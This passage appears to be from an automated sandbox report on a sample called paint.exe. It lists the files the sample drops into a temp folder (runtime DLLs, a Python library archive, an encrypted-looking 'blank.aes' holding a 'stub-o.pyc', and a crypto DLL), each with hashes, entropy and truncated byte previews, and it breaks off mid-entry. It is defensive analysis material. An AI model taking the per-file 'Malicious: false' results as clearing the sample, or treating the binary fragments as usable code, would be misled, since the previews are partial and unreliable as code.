Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......e.........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..P...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-rtlsupport-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.754374422741657
Encrypted:	false
SSDEEP:	192:CGeVPWqhWUWJWadJCsVWQ4mWUhSqyttuX01k9z3A2lqn7cq:CGeVPWqhWBCsvoSR9zflBq
MD5:	A0C2DBE0F5E18D1ADD0D1BA22580893B
SHA1:	29624DF37151905467A223486500ED75617A1DFD
SHA-256:	3C29730DF2B28985A30D9C82092A1FAA0CEB7FFC1BD857D1EF6324CF5524802F
SHA-512:	3E627F111196009380D1687E024E6FFB1C0DCF4DCB27F8940F17FEC7EFDD8152FF365B43CB7FDB31DE300955D6C15E40A2C8FB6650A91706D7EA1C5D89319B12
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......Z.........." .........0...............................................@............`A........................................p...<............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-string-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.664553499673792
Encrypted:	false
SSDEEP:	192:mZyMvr5WqhWAWJWadJCsVWQ4mWWqpNVAv+cQ0GX01k9z3ARo+GZ:mZyMvlWqhWNCsUpNbZR9zQo+GZ
MD5:	2666581584BA60D48716420A6080ABDA
SHA1:	C103F0EA32EBBC50F4C494BCE7595F2B721CB5AD
SHA-256:	27E9D3E7C8756E4512932D674A738BF4C2969F834D65B2B79C342A22F662F328
SHA-512:	BEFED15F11A0550D2859094CC15526B791DADEA12C2E7CEB35916983FB7A100D89D638FB1704975464302FAE1E1A37F36E01E4BEF5BC4924AB8F3FD41E60BD0C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....I..........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..l...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-synch-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	5.146069394118203
Encrypted:	false
SSDEEP:	384:vUwidv3V0dfpkXc0vVaCsWqhWjCsa2IR9z5Bk5l:sHdv3VqpkXc0vVaP+U9zzk5l
MD5:	225D9F80F669CE452CA35E47AF94893F
SHA1:	37BD0FFC8E820247BD4DB1C36C3B9F9F686BBD50
SHA-256:	61C0EBE60CE6EBABCB927DDFF837A9BF17E14CD4B4C762AB709E630576EC7232
SHA-512:	2F71A3471A9868F4D026C01E4258AFF7192872590F5E5C66AABD3C088644D28629BA8835F3A4A23825631004B1AFD440EFE7161BB9FC7D7C69E0EE204813CA7B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....x.........." .........0...............................................@.......J....`A........................................p...X............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-synch-l1-2-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.834520503429805
Encrypted:	false
SSDEEP:	192:etZ3xWqhWqWJWadJCsVWQ4mWfH/fKUSIX01k9z3AEXz40OY:etZ3xWqhWHCsMH2IR9z5OY
MD5:	1281E9D1750431D2FE3B480A8175D45C
SHA1:	BC982D1C750B88DCB4410739E057A86FF02D07EF
SHA-256:	433BD8DDC4F79AEE65CA94A54286D75E7D92B019853A883E51C2B938D2469BAA
SHA-512:	A954E6CE76F1375A8BEAC51D751B575BBC0B0B8BA6AA793402B26404E45718165199C2C00CCBCBA3783C16BDD96F0B2C17ADDCC619C39C8031BECEBEF428CE77
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@.......w....`A........................................p...x............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-sysinfo-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.916367637528538
Encrypted:	false
SSDEEP:	192:qaIMFSYWqhWzWJWadJCsVWQ4mW14LyttuX01k9z3A2ClV:qdYWqhWqCsISR9zfCT
MD5:	FD46C3F6361E79B8616F56B22D935A53
SHA1:	107F488AD966633579D8EC5EB1919541F07532CE
SHA-256:	0DC92E8830BC84337DCAE19EF03A84EF5279CF7D4FDC2442C1BC25320369F9DF
SHA-512:	3360B2E2A25D545CCD969F305C4668C6CDA443BBDBD8A8356FFE9FBC2F70D90CF4540F2F28C9ED3EEA6C9074F94E69746E7705E6254827E6A4F158A75D81065B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...~.l-.........." .........0...............................................@............`A........................................p................0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-timezone-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.829681745003914
Encrypted:	false
SSDEEP:	192:HNpWqhW5WJWadJCsVWQ4mWbZyttuX01k9z3A2qkFU:HXWqhW4Cs1SR9zf9U
MD5:	D12403EE11359259BA2B0706E5E5111C
SHA1:	03CC7827A30FD1DEE38665C0CC993B4B533AC138
SHA-256:	F60E1751A6AC41F08E46480BF8E6521B41E2E427803996B32BDC5E78E9560781
SHA-512:	9004F4E59835AF57F02E8D9625814DB56F0E4A98467041DA6F1367EF32366AD96E0338D48FFF7CC65839A24148E2D9989883BCDDC329D9F4D27CAE3F843117D0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...>.os.........." .........0...............................................@............`A........................................p...H............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-core-util-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.612408827336625
Encrypted:	false
SSDEEP:	192:CWqhW+WJWadJCsVWQ4mWprgfKUSIX01k9z3AEXzh:CWqhW7Cs12IR9z5F
MD5:	0F129611A4F1E7752F3671C9AA6EA736
SHA1:	40C07A94045B17DAE8A02C1D2B49301FAD231152
SHA-256:	2E1F090ABA941B9D2D503E4CD735C958DF7BB68F1E9BDC3F47692E1571AAAC2F
SHA-512:	6ABC0F4878BB302713755A188F662C6FE162EA6267E5E1C497C9BA9FDDBDAEA4DB050E322CB1C77D6638ECF1DAD940B9EBC92C43ACAA594040EE58D313CBCFAE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....+..........." .........0...............................................@............`A........................................p...<............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-conio-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.918215004381039
Encrypted:	false
SSDEEP:	192:OvMWqhWkWJWadJCsVWQ4mWoz/HyttuX01k9z3A21O:JWqhWxCs/SSR9zf1O
MD5:	D4FBA5A92D68916EC17104E09D1D9D12
SHA1:	247DBC625B72FFB0BF546B17FB4DE10CAD38D495
SHA-256:	93619259328A264287AEE7C5B88F7F0EE32425D7323CE5DC5A2EF4FE3BED90D5
SHA-512:	D5A535F881C09F37E0ADF3B58D41E123F527D081A1EBECD9A927664582AE268341771728DC967C30908E502B49F6F853EEAEBB56580B947A629EDC6BCE2340D8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...Aj............" .........0...............................................@......UJ....`A.........................................................0...............0..x&..............p............................................................................rdata..p...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-convert-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26216
Entropy (8bit):	4.882777558752248
Encrypted:	false
SSDEEP:	192:I9cy5WqhWKWEXCVWQ4mW1pbm6yttuX01k9z3A2jyM:Ry5WqhWdcbmLSR9zfjj
MD5:	EDF71C5C232F5F6EF3849450F2100B54
SHA1:	ED46DA7D59811B566DD438FA1D09C20F5DC493CE
SHA-256:	B987AB40CDD950EBE7A9A9176B80B8FFFC005CCD370BB1CBBCAD078C1A506BDC
SHA-512:	481A3C8DC5BEF793EE78CE85EC0F193E3E9F6CD57868B813965B312BD0FADEB5F4419707CD3004FBDB407652101D52E061EF84317E8BD458979443E9F8E4079A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...U.gJ.........." .........@...............................................P............`A.........................................................@...............@..h&..............p............................................................................rdata..n........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-environment-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.738587310329139
Encrypted:	false
SSDEEP:	192:TWqhWXWEXCVWQ4mWPXTNyttuX01k9z3A2dGxr:TWqhWMKASR9zfYxr
MD5:	F9235935DD3BA2AA66D3AA3412ACCFBF
SHA1:	281E548B526411BCB3813EB98462F48FFAF4B3EB
SHA-256:	2F6BD6C235E044755D5707BD560A6AFC0BA712437530F76D11079D67C0CF3200
SHA-512:	AD0C0A7891FB8328F6F0CF1DDC97523A317D727C15D15498AFA53C07610210D2610DB4BC9BD25958D47ADC1AF829AD4D7CF8AABCAB3625C783177CCDB7714246
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...9.4o.........." .........0...............................................@......h*....`A............................................"............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-filesystem-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	5.202163846121633
Encrypted:	false
SSDEEP:	192:2pUEpnWlC0i5CBWqhWXLeWEXCVWQ4iW+/x6RMySX01k9z3Aza8Az629:2ptnWm5CBWqhWtWMR9zqaH629
MD5:	5107487B726BDCC7B9F7E4C2FF7F907C
SHA1:	EBC46221D3C81A409FAB9815C4215AD5DA62449C
SHA-256:	94A86E28E829276974E01F8A15787FDE6ED699C8B9DC26F16A51765C86C3EADE
SHA-512:	A0009B80AD6A928580F2B476C1BDF4352B0611BB3A180418F2A42CFA7A03B9F0575ED75EC855D30B26E0CCA96A6DA8AFFB54862B6B9AFF33710D2F3129283FAA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......M4....`A.........................................................0...............0..h&..............p............................................................................rdata..0...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-heap-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.866983142029453
Encrypted:	false
SSDEEP:	192:0vh8Y17aFBRsWqhW9AWEXCVWQ4mWCB4Lrp0KBQfX01k9z3ALkg5Z7:SL5WqhW9boRxB+R9z2kM7
MD5:	D5D77669BD8D382EC474BE0608AFD03F
SHA1:	1558F5A0F5FACC79D3957FF1E72A608766E11A64
SHA-256:	8DD9218998B4C4C9E8D8B0F8B9611D49419B3C80DAA2F437CBF15BCFD4C0B3B8
SHA-512:	8DEFA71772105FD9128A669F6FF19B6FE47745A0305BEB9A8CADB672ED087077F7538CD56E39329F7DAA37797A96469EAE7CD5E4CCA57C9A183B35BDC44182F3
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...."]..........." .........0...............................................@............`A.........................................................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-locale-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.828044267819929
Encrypted:	false
SSDEEP:	192:dUnWqhWRWJWadJCsVWQ4mW+2PyttuX01k9z3A23y:cWqhWQCsHSR9zf3y
MD5:	650435E39D38160ABC3973514D6C6640
SHA1:	9A5591C29E4D91EAA0F12AD603AF05BB49708A2D
SHA-256:	551A34C400522957063A2D71FA5ABA1CD78CC4F61F0ACE1CD42CC72118C500C0
SHA-512:	7B4A8F86D583562956593D27B7ECB695CB24AB7192A94361F994FADBA7A488375217755E7ED5071DE1D0960F60F255AA305E9DD477C38B7BB70AC545082C9D5E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...6..q.........." .........0...............................................@.......-....`A............................................e............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-math-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	30328
Entropy (8bit):	5.14173409150951
Encrypted:	false
SSDEEP:	384:r7yaFM4Oe59Ckb1hgmLVWqhW2CsWNbZR9zQoekS:/FMq59Bb1jnoFT9zGp
MD5:	B8F0210C47847FC6EC9FBE2A1AD4DEBB
SHA1:	E99D833AE730BE1FEDC826BF1569C26F30DA0D17
SHA-256:	1C4A70A73096B64B536BE8132ED402BCFB182C01B8A451BFF452EFE36DDF76E7
SHA-512:	992D790E18AC7AE33958F53D458D15BFF522A3C11A6BD7EE2F784AC16399DE8B9F0A7EE896D9F2C96D1E2C8829B2F35FF11FC5D8D1B14C77E22D859A1387797C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................" .........P...............................................`............`A.............................................%...........P...............P..x&..............p............................................................................rdata...'.......0..................@..@.data........@......................@....rsrc........P.......@..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-process-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.883012715268179
Encrypted:	false
SSDEEP:	192:5eXrqjd7ZWqhW3WEXCVWQ4mW3Ql1Lrp0KBQfX01k9z3ALkjY/12:54rgWqhWsP1RxB+R9z2kjY/Y
MD5:	272C0F80FD132E434CDCDD4E184BB1D8
SHA1:	5BC8B7260E690B4D4039FE27B48B2CECEC39652F
SHA-256:	BD943767F3E0568E19FB52522217C22B6627B66A3B71CD38DD6653B50662F39D
SHA-512:	94892A934A92EF1630FBFEA956D1FE3A3BFE687DEC31092828960968CB321C4AB3AF3CAF191D4E28C8CA6B8927FBC1EC5D17D5C8A962C848F4373602EC982CD4
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...<SdT.........." .........0...............................................@......N.....`A............................................x............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-runtime-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26208
Entropy (8bit):	5.023753175006074
Encrypted:	false
SSDEEP:	192:4mGqX8mPrpJhhf4AN5/KiFWqhWyzWEXCVWQ4OW4034hHssDX01k9z3AaYX2cWo:4ysyr77WqhWyI0oFDR9z9YH9
MD5:	20C0AFA78836B3F0B692C22F12BDA70A
SHA1:	60BB74615A71BD6B489C500E6E69722F357D283E
SHA-256:	962D725D089F140482EE9A8FF57F440A513387DD03FDC06B3A28562C8090C0BC
SHA-512:	65F0E60136AB358661E5156B8ECD135182C8AAEFD3EC320ABDF9CFC8AEAB7B68581890E0BBC56BAD858B83D47B7A0143FA791195101DC3E2D78956F591641D16
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....TR.........." .........@...............................................P......D!....`A............................................4............@...............@..`&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-stdio-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26232
Entropy (8bit):	5.289041983400337
Encrypted:	false
SSDEEP:	192:UuV2OlkuWYFxEpahfWqhWNWJWadJCsVWQ4mWeX9UfKUSIX01k9z3AEXzGd5S:dV2oFVhfWqhWMCstE2IR9z5Sd5S
MD5:	96498DC4C2C879055A7AFF2A1CC2451E
SHA1:	FECBC0F854B1ADF49EF07BEACAD3CEC9358B4FB2
SHA-256:	273817A137EE049CBD8E51DC0BB1C7987DF7E3BF4968940EE35376F87EF2EF8D
SHA-512:	4E0B2EF0EFE81A8289A447EB48898992692FEEE4739CEB9D87F5598E449E0059B4E6F4EB19794B9DCDCE78C05C8871264797C14E4754FD73280F37EC3EA3C304
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...k. U.........." .........@...............................................P............`A............................................a............@...............@..x&..............p............................................................................rdata........... ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-string-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26232
Entropy (8bit):	5.284932479906984
Encrypted:	false
SSDEEP:	384:tCLx0C5yguNvZ5VQgx3SbwA7yMVIkFGlTWqhWbQCsMSR9zful:tCV5yguNvZ5VQgx3SbwA71IkFGqHe9zI
MD5:	115E8275EB570B02E72C0C8A156970B3
SHA1:	C305868A014D8D7BBEF9ABBB1C49A70E8511D5A6
SHA-256:	415025DCE5A086DBFFC4CF322E8EAD55CB45F6D946801F6F5193DF044DB2F004
SHA-512:	B97EF7C5203A0105386E4949445350D8FF1C83BDEAEE71CCF8DC22F7F6D4F113CB0A9BE136717895C36EE8455778549F629BF8D8364109185C0BF28F3CB2B2CA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.... .h.........." .........@...............................................P......\.....`A.........................................................@...............@..x&..............p............................................................................rdata.._........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-time-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	5.253102285412285
Encrypted:	false
SSDEEP:	192:mt3hwDGWqhWrWEXCVWQ4mWn+deyttuX01k9z3A23x:AWqhWgPSR9zfh
MD5:	001E60F6BBF255A60A5EA542E6339706
SHA1:	F9172EC37921432D5031758D0C644FE78CDB25FA
SHA-256:	82FBA9BC21F77309A649EDC8E6FC1900F37E3FFCB45CD61E65E23840C505B945
SHA-512:	B1A6DC5A34968FBDC8147D8403ADF8B800A06771CC9F15613F5CE874C29259A156BAB875AAE4CAAEC2117817CE79682A268AA6E037546AECA664CD4EEA60ADBF
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...G............" .........0...............................................@.......&....`A.........................................................0...............0..h&..............p............................................................................rdata..=...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\api-ms-win-crt-utility-l1-1-0.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22136
Entropy (8bit):	4.810971823417463
Encrypted:	false
SSDEEP:	192:p/fHQduDWqhWJWJWadJCsVWQ4mWxrnyttuX01k9z3A2Yv6WT:p/ftWqhWoCsmySR9zfYvvT
MD5:	A0776B3A28F7246B4A24FF1B2867BDBF
SHA1:	383C9A6AFDA7C1E855E25055AAD00E92F9D6AAFF
SHA-256:	2E554D9BF872A64D2CD0F0EB9D5A06DEA78548BC0C7A6F76E0A0C8C069F3C0A9
SHA-512:	7C9F0F8E53B363EF5B2E56EEC95E7B78EC50E9308F34974A287784A1C69C9106F49EA2D9CA037F0A7B3C57620FCBB1C7C372F207C68167DF85797AFFC3D7F3BA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...2............." .........0...............................................@......^.....`A............................................^............0...............0..x&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI67162\base_library.zip

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	1333418
Entropy (8bit):	5.586394615389979
Encrypted:	false
SSDEEP:	12288:q8lJGUmc4rmn9OPNsxuy4htMHc1b4oDAH2tQR+lBfdmsP/HINa9/Rr2/Hq:q8lJGUQ697lH2WEfdmsPvBt2/Hq
MD5:	0CB8186855E5A17427AA0F2D16E491A9
SHA1:	8E370A2A864079366D329377BEC1A9BBC54B185C
SHA-256:	13E24B36C20B3DA9914C67B61614B262F3FC1CA7B2EE205DED41ACC57865BFEF
SHA-512:	855FF87E74E4BD4719DB5B17E577E5AE6CA5EEDD539B379625B28BCCDF417F15651A3BACF06D6188C3FCAAC5814DEE753BF058F59F73C7050A0716AA7E718168
Malicious:	false
Preview:	PK..........!..[..Z...Z......._collections_abc.pyc......................................Z.....d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.............Z...e.d.........Z.d...Z...e.e.........Z.[.g.d...Z.d.Z...e...e.d.................Z...e...e...e.........................Z...e...e.i.j%..........................................Z...e...e.i.j)..........................................Z...e...e.i.j-..........................................Z...e...e.g.................Z...e...e...e.g.........................Z...e...e...e.d.........................Z...e...e...e.d.d.z...........................Z...e...e...e.........................Z...e...e.d.................Z ..e...e.d.................Z!..e...e...e"........................Z#..e.i.j%..................................Z$..e.i.j)..................................Z%..e.i.j-..................................Z&..e.e.jN..........................Z(..e...d...................Z)d...Z..e........Z..e.e........Z+ejY............................[d...Z-..e-........

C:\Users\user\AppData\Local\Temp\_MEI67162\blank.aes

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	112878
Entropy (8bit):	7.747901064486674
Encrypted:	false
SSDEEP:	1536:69JWhAScHeNs0hxZl3Urc2dfdgAiN4DE7+zlaY3y28CT7cB+xMDlhLxZYFSHgAdm:E3HJ0hzdUndcSzOSMB+xoHvdw0NY
MD5:	4021972780A9E20381E924565F92D71F
SHA1:	C262C1413C31AD54C7FE360F656B9A5BBBF5D70D
SHA-256:	CA9649C12BABFF458759F48C5DF74FCCA1A586BF4F93F5077C34C090C9D39ACC
SHA-512:	AE2692B8E63D255FBD249117F639AD5F096CB052980A8C35ED55F204CCE77F52E3441E475C8342A568AF1D48F74CF59E139A1AC4E533D2BA4AFA4A4EDCAE6A3A
Malicious:	false
Preview:	PK..........%Z..b.x...x.......stub-o.pyc.........6zg.................................e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j...................................Z.d...Z.d.Z.....e...e.....e...e...e.g.d...........j.....................................e.g.d...........j.....................................e.g.d...................j.......

C:\Users\user\AppData\Local\Temp\_MEI67162\libcrypto-3.dll

Download File

Process:	C:\Users\user\Desktop\paint.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1630488
Entropy (8bit):	7.952879310777133
Encrypted:	false
SSDEEP:	49152:f3Y7UGnm3dtF6Q5xkI61CPwDvt3uFlDCm:/Y7Bm3dz6Q5c1CPwDvt3uFlDCm
MD5:	8377FE5949527DD7BE7B827CB1FFD324
